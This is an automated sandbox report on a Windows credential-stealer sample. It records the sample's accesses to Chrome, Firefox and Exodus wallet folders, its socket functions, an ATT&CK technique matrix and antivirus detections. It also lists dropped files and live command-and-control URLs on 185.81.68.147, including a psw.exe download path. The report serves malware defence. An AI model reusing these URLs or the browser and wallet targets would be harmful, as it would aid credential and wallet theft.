    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCacheJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\DefaultJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User DataJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnaclJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetricsJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PKIMetadataJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdmJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\SessionsJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\FirefoxJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\AutofillStatesJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\StorageJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\NetworkJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCacheJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CrashpadJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTipsJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImprovedJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reportsJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrialsJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd DenyJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\ProfilesJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\ChromeJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePoliciesJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CacheJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe BrowsingJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\ChromeJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: CwQQqCmqkY.exe PID: 4144, type: MEMORYSTR
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12B7AC0 WSAGetLastError,htons,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,0_2_00007FF7F12B7AC0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12D1C72 bind,WSAGetLastError,0_2_00007FF7F12D1C72
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12D1EF0 bind,WSAGetLastError,0_2_00007FF7F12D1EF0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12DE270 getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,0_2_00007FF7F12DE270
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12C8BA0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,0_2_00007FF7F12C8BA0
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Masquerading
    1
    OS Credential Dumping
    2
    System Time Discovery
    1
    Exploitation of Remote Services
    12
    Archive Collected Data
    1
    Data Obfuscation
    Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts1
    Native API
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Deobfuscate/Decode Files or Information
    LSASS Memory21
    Security Software Discovery
    Remote Desktop Protocol2
    Data from Local System
    2
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
    Obfuscated Files or Information
    Security Account Manager1
    Account Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDS1
    System Owner/User Discovery
    Distributed Component Object ModelInput Capture1
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
    File and Directory Discovery
    SSHKeylogging1
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials34
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    CwQQqCmqkY.exe26%VirustotalBrowse
    CwQQqCmqkY.exe53%ReversingLabsWin64.Hacktool.SvcStealer
    CwQQqCmqkY.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://185.81.68.147/gg.phps64100%Avira URL Cloudphishing
    http://185.81.68.147/gg.php100%Avira URL Cloudphishing
    http://185.81.68.147/psw.exe100%Avira URL Cloudphishing
    http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg100%Avira URL Cloudphishing
    http://185.81.68.147/gg.phpReflectiveLoader100%Avira URL Cloudphishing
    http://www.winimage.com/zLibDll1.3.1-wbr0%Avira URL Cloudsafe
    http://185.81.68.147/gg.phpspace100%Avira URL Cloudphishing
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://185.81.68.147/gg.phptrue
    • Avira URL Cloud: phishing
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://curl.se/docs/hsts.htmlCwQQqCmqkY.exefalse
      high
      https://curl.se/docs/alt-svc.html#CwQQqCmqkY.exefalse
        high
        http://185.81.68.147/gg.phpspaceCwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAgCwQQqCmqkY.exefalse
        • Avira URL Cloud: phishing
        unknown
        https://curl.se/docs/http-cookies.htmlCwQQqCmqkY.exefalse
          high
          https://curl.se/docs/hsts.html#CwQQqCmqkY.exefalse
            high
            http://185.81.68.147/psw.exeCwQQqCmqkY.exe, CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            http://www.winimage.com/zLibDllCwQQqCmqkY.exefalse
              high
              https://curl.se/docs/http-cookies.html#CwQQqCmqkY.exefalse
                high
                http://185.81.68.147/gg.phps64CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                https://curl.se/docs/alt-svc.htmlCwQQqCmqkY.exefalse
                  high
                  http://www.winimage.com/zLibDll1.3.1-wbrCwQQqCmqkY.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.81.68.147/gg.phpReflectiveLoaderCwQQqCmqkY.exefalse
                  • Avira URL Cloud: phishing
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  185.81.68.147
                  unknownFinland
                  50108KLNOPT-ASFItrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1580848
                  Start date and time:2024-12-26 12:03:07 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 30s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:4
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:CwQQqCmqkY.exe
                  renamed because original name is a hash value
                  Original Sample Name:1a477a5659d817b01a50f2a80cb1d76e.exe
                  Detection:MAL
                  Classification:mal96.troj.spyw.winEXE@1/38@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 74
                  • Number of non-executed functions: 187
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.81.68.147uFVgJVXaEU.exeGet hashmaliciousRedLineBrowse
                  • 185.81.68.147/VzCAHn.php?2F409E82DCA61388941053
                  m5804Te9Uw.exeGet hashmaliciousRedLineBrowse
                  • 185.81.68.147/VzCAHn.php?443320E440F81953448019
                  3Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                  • 185.81.68.147/VzCAHn.php?65D35BAB97073674480464
                  K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                  • 185.81.68.147/VzCAHn.php?616766F8886C145454191
                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                  • 185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
                  mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 185.81.68.147/7vhfjke3/index.php
                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                  • 185.81.68.147/7vhfjke3/index.php
                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                  • 185.81.68.147/7vhfjke3/index.php
                  hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                  • 185.81.68.147/7vhfjke3/index.php?wal=1
                  tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                  • 185.81.68.147/7vhfjke3/index.php
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  KLNOPT-ASFIuFVgJVXaEU.exeGet hashmaliciousRedLineBrowse
                  • 185.81.68.147
                  m5804Te9Uw.exeGet hashmaliciousRedLineBrowse
                  • 185.81.68.147
                  3Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                  • 185.81.68.147
                  K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                  • 185.81.68.147
                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                  • 185.81.68.147
                  mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 185.81.68.148
                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                  • 185.81.68.148
                  D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                  • 185.81.68.148
                  hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                  • 185.81.68.148
                  tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                  • 185.81.68.148
                  No context
                  No context
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5
                  Entropy (8bit):2.321928094887362
                  Encrypted:false
                  SSDEEP:3:Dy:W
                  MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
                  SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
                  SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
                  SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:0.1..
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5
                  Entropy (8bit):2.321928094887362
                  Encrypted:false
                  SSDEEP:3:Ay:Ay
                  MD5:C204E9FAAF8565AD333828BEFF2D786E
                  SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                  SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                  SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:0.2..
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):764
                  Entropy (8bit):2.71278771083604
                  Encrypted:false
                  SSDEEP:12:YIrxA3rOpKmA4RP7EcJBSiGl6s8A6yZn2KKrn2U3QPZRpX5Cwo5WHWn:YIrcSpKmNRwcfHGF8AJp9WtAZRJ5poI2
                  MD5:3E059D830158FF4A28F904D1CF0DBE84
                  SHA1:B5FC22017FA5BBE4728A93CFC27F8300EEAE310F
                  SHA-256:33FACD9836FDB30E3916C74E1AFCBD7A3A209D65F2B5BCF3FD81C7585047C196
                  SHA-512:1AC6CC78050CFC70EE9A0A46D11EA0F21262036A3359E3BED28D4F3967C9449EA5B8872CC4477E7517BF06B8CD814EB30C0CE5B5F5A32B4970C0E4CDF63FE3BD
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.7.4.6.3.7.8.,.3.2.9.4.5.8.7.9.9.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):154
                  Entropy (8bit):4.632246241243701
                  Encrypted:false
                  SSDEEP:3:N8FZHgidIuj+0WT80ZHgidIu9JgidIurcVSvlYuzXLZM:27HgidpZWT8yHgidBgidxcVStlXLZM
                  MD5:C05DE5103FBCEFB5C5A947D4EDC2E05B
                  SHA1:46758D7F19C6996A42BF55DCD522370C29A7F7DD
                  SHA-256:89FE6A6923D7B4F1F5B9A83D7ECD49A5C650084E4666768F1EB43DEE4113759A
                  SHA-512:1D5544A54A1748A374410269FDD3C380B019190537FDC564B307BE35CA3DD787FCAD29AAD1458A9EB007C6A1CA55A8ED70F9049E0204EED02C887C52EA523687
                  Malicious:false
                  Reputation:low
                  Preview:https:push.services.mozilla.com:443:.::3.0.19635.https:push.services.mozilla.com:443:push.services.mozilla.com:443::n:1699078835:h3:y:1696486833:n::|n:y:.
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:93B885ADFE0DA089CDF634904FD59F71
                  SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                  SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                  SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                  Malicious:false
                  Preview:.
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:H:H
                  MD5:455831477B82574F6BF871193F2F761D
                  SHA1:F44217A81173869E08671753C52553646FF5D95B
                  SHA-256:69BF0BC46F51B33377C4F3D92CAF876714F6BBBE99E7544487327920873F9820
                  SHA-512:CBC0EE58E447428BDCF72FC8B03C8CFB086EDBB14205B918E75EBEFF1D85FF1DD254E9DCB387AFBD3FA766C803937C306E0A2A79870C0D87ABCB7AB93661CF85
                  Malicious:false
                  Preview:****
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:H:H
                  MD5:455831477B82574F6BF871193F2F761D
                  SHA1:F44217A81173869E08671753C52553646FF5D95B
                  SHA-256:69BF0BC46F51B33377C4F3D92CAF876714F6BBBE99E7544487327920873F9820
                  SHA-512:CBC0EE58E447428BDCF72FC8B03C8CFB086EDBB14205B918E75EBEFF1D85FF1DD254E9DCB387AFBD3FA766C803937C306E0A2A79870C0D87ABCB7AB93661CF85
                  Malicious:false
                  Preview:****
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:H:H
                  MD5:455831477B82574F6BF871193F2F761D
                  SHA1:F44217A81173869E08671753C52553646FF5D95B
                  SHA-256:69BF0BC46F51B33377C4F3D92CAF876714F6BBBE99E7544487327920873F9820
                  SHA-512:CBC0EE58E447428BDCF72FC8B03C8CFB086EDBB14205B918E75EBEFF1D85FF1DD254E9DCB387AFBD3FA766C803937C306E0A2A79870C0D87ABCB7AB93661CF85
                  Malicious:false
                  Preview:****
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):450
                  Entropy (8bit):4.936435289733623
                  Encrypted:false
                  SSDEEP:12:eHXB3IyZQF3IrgQF3IW9QryZRJBXB3IWR5WqcQZ/cKlZL5wyZ3KrocQF3Iw:eHx3pw33w3r4yZRJBx3F3VcMjCyZ3KLa
                  MD5:C21038C2453AB5E61624F10D7F08A4E6
                  SHA1:D080349C4447DD6492069E74A3CB8710DFF7439B
                  SHA-256:4232595847050D63E92EBB0D81D5F512EA511B87349538483FF7CBAB6C0E0986
                  SHA-512:B0241336B624051AF16C5FC454124E09E1051E8ECE33E7F50E8A573EF094F9EC6B46550AFE4A42DAFE870CE881EFF72EFC6739E0CEA0BE19DB8C14E85EBBCCD7
                  Malicious:false
                  Preview:aus5.mozilla.org.0.19635.1728022834935,1,0.contile.services.mozilla.com.0.19635.1728022834480,1,0.location.services.mozilla.com.0.19635.1728022834317,1,1.incoming.telemetry.mozilla.org.0.19635.1728022834518,1,0.spocs.getpocket.com.0.19635.1759558835101,1,0.shavar.services.mozilla.com^firstPartyDomain=safebrowsing.86868755-6b82-4842-b301-72671a0db32e.mozilla.0.19635.1728022835060,1,1.firefox.settings.services.mozilla.com.0.19635.1728022834587,1,0.
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):353
                  Entropy (8bit):5.335570770643404
                  Encrypted:false
                  SSDEEP:6:muemWElnXFbRNLQqwBEoNN2RmU9mVW2yUiQPMVWK/lAAAB6nglCGyA2l5:demW8nXFFNLQqwBEoP2d9YW210VWKNA6
                  MD5:F537D7FC77C78DACC8356BDA2198E4FE
                  SHA1:655A59923574DD7C0C1AD8D3392306015179BFD3
                  SHA-256:56657BCBA98EB60B1666075544688D8241930F4950CDC0034E71A2C8A5B6C309
                  SHA-512:2BA15EEC91063EBAE860CAD2BED3DFEC9AD53C2005E65C365EFFFD75421F8D78F08F45ABB0B45B813313B6CAB90B374FE188C1667660651595A14DBA2B9E2E4C
                  Malicious:false
                  Preview:User Name: user..Computer Name: 226533..HWID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..Windows Version: 6.2..Install Path: C:\Users\user\Desktop\CwQQqCmqkY.exe..Processor Architecture: 9..Page Size: 4096..Number of Processors: 4..Processor Type: 8664..RAM Size: 8191 MB..Screen Resolution: 1280 x 1024..System Language: en..BIOS Version: P......
                  Process:C:\Users\user\Desktop\CwQQqCmqkY.exe
                  File Type:ASCII text, with very long lines (975), with no line terminators
                  Category:dropped
                  Size (bytes):975
                  Entropy (8bit):5.761205683904012
                  Encrypted:false
                  SSDEEP:24:UfDTQedu+/O7dZkNhFCzgQxDLM8x1OJNl/foKuehOcC:U7TQedu+/O7dZFgMDOJNFPhOD
                  MD5:DB7C7DCA873D7D732E570B272B16FA17
                  SHA1:4A26E57A5C88663F8135F17537DD8AC0597F005B
                  SHA-256:539D7F4F275098780B3CBB100210F1C7912B7C7BE384BCDAB57C2FE3DB027EDD
                  SHA-512:A2F9B789ECD61F4AAE7A54F5F7E94701D347D20FC073066716D8F5EBAFC534194370109EA5057C2AC69426C8B0C50698415ED372BCBDAA432B37F25499688306
                  Malicious:false
